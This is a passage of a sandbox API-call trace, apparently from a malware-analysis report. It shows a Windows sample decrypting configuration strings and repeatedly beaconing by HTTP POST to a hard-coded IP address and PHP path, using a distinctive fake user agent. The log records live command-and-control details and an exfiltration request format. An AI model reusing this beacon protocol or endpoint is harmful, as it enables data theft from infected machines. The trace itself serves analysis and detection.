Flags=0x0, Size=0x24) returned 0x6a8a00 [0222.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.888] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.889] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.890] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.890] GetProcessHeap () returned 0x690000 [0222.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0222.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.892] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0222.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.900] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.901] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0222.901] GetProcessHeap () returned 0x690000 [0222.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.902] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.903] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.904] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.905] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.905] GetProcessHeap () returned 0x690000 [0222.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0222.905] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.905] GetProcessHeap () returned 0x690000 [0222.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0222.906] GetProcessHeap () returned 0x690000 [0222.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0222.906] GetProcessHeap () returned 0x690000 [0222.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0222.907] GetProcessHeap () returned 0x690000 [0222.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0222.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.910] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0222.924] GetProcessHeap () returned 0x690000 [0222.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0222.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.925] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0222.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.926] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.927] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.927] GetProcessHeap () returned 0x690000 [0222.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0222.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.929] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0222.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.929] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0222.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.930] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0222.930] GetProcessHeap () returned 0x690000 [0222.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.931] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0222.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.932] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0222.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.933] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0222.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.934] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0222.934] GetProcessHeap () returned 0x690000 [0222.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0222.934] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0222.934] GetProcessHeap () returned 0x690000 [0222.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0222.934] socket (af=2, type=1, protocol=6) returned 0x584 [0222.934] connect (s=0x584, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0222.966] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0222.966] GetProcessHeap () returned 0x690000 [0222.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0222.966] GetProcessHeap () returned 0x690000 [0222.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0222.967] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.968] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.968] GetProcessHeap () returned 0x690000 [0222.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0222.968] GetProcessHeap () returned 0x690000 [0222.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.969] GetProcessHeap () returned 0x690000 [0222.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0222.969] GetProcessHeap () returned 0x690000 [0222.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0222.969] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.970] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.970] GetProcessHeap () returned 0x690000 [0222.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0222.970] GetProcessHeap () returned 0x690000 [0222.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.971] send (s=0x584, buf=0x6ab500*, len=242, flags=0) returned 242 [0222.971] send (s=0x584, buf=0x6aba40*, len=159, flags=0) returned 159 [0222.971] GetProcessHeap () returned 0x690000 [0222.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0222.971] recv (in: s=0x584, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0223.062] GetProcessHeap () returned 0x690000 [0223.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0223.062] GetProcessHeap () returned 0x690000 [0223.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0223.063] GetProcessHeap () returned 0x690000 [0223.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0223.068] GetProcessHeap () returned 0x690000 [0223.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0223.069] closesocket (s=0x584) returned 0 [0223.069] GetProcessHeap () returned 0x690000 [0223.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0223.070] GetProcessHeap () returned 0x690000 [0223.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.070] GetProcessHeap () returned 0x690000 [0223.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0223.071] GetProcessHeap () returned 0x690000 [0223.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0223.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf20) returned 0x584 [0223.073] Sleep (dwMilliseconds=0xea60) [0223.127] GetProcessHeap () returned 0x690000 [0223.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0223.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.128] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0223.172] GetProcessHeap () returned 0x690000 [0223.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0223.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.173] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0223.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.174] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.182] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.182] GetProcessHeap () returned 0x690000 [0223.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0223.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.183] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0223.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.184] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0223.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.185] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0223.185] GetProcessHeap () returned 0x690000 [0223.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0223.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.186] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.187] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.188] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.189] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.189] GetProcessHeap () returned 0x690000 [0223.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0223.189] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.189] GetProcessHeap () returned 0x690000 [0223.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0223.190] GetProcessHeap () returned 0x690000 [0223.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.190] GetProcessHeap () returned 0x690000 [0223.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.190] GetProcessHeap () returned 0x690000 [0223.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0223.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.192] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0223.213] GetProcessHeap () returned 0x690000 [0223.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0223.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.214] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.216] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.216] GetProcessHeap () returned 0x690000 [0223.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0223.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.218] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0223.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.219] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.221] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0223.221] GetProcessHeap () returned 0x690000 [0223.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0223.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.222] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0223.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.223] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0223.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.224] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0223.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.224] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0223.224] GetProcessHeap () returned 0x690000 [0223.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0223.225] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0223.225] GetProcessHeap () returned 0x690000 [0223.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0223.225] socket (af=2, type=1, protocol=6) returned 0x588 [0223.225] connect (s=0x588, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0223.251] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0223.251] GetProcessHeap () returned 0x690000 [0223.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0223.251] GetProcessHeap () returned 0x690000 [0223.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0223.252] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.255] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.255] GetProcessHeap () returned 0x690000 [0223.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0223.255] GetProcessHeap () returned 0x690000 [0223.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.256] GetProcessHeap () returned 0x690000 [0223.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0223.256] GetProcessHeap () returned 0x690000 [0223.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0223.256] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.257] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.257] GetProcessHeap () returned 0x690000 [0223.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0223.257] GetProcessHeap () returned 0x690000 [0223.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.257] send (s=0x588, buf=0x6ad508*, len=242, flags=0) returned 242 [0223.258] send (s=0x588, buf=0x6aba40*, len=159, flags=0) returned 159 [0223.258] GetProcessHeap () returned 0x690000 [0223.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0223.258] recv (in: s=0x588, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0223.332] GetProcessHeap () returned 0x690000 [0223.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0223.333] GetProcessHeap () returned 0x690000 [0223.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.333] GetProcessHeap () returned 0x690000 [0223.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0223.334] GetProcessHeap () returned 0x690000 [0223.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0223.335] closesocket (s=0x588) returned 0 [0223.335] GetProcessHeap () returned 0x690000 [0223.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0223.335] GetProcessHeap () returned 0x690000 [0223.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.335] GetProcessHeap () returned 0x690000 [0223.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0223.336] GetProcessHeap () returned 0x690000 [0223.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0223.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x880) returned 0x588 [0223.338] Sleep (dwMilliseconds=0xea60) [0223.339] GetProcessHeap () returned 0x690000 [0223.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0223.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0223.353] GetProcessHeap () returned 0x690000 [0223.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0223.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.354] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.355] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.355] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.355] GetProcessHeap () returned 0x690000 [0223.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0223.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.358] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0223.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.359] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.359] 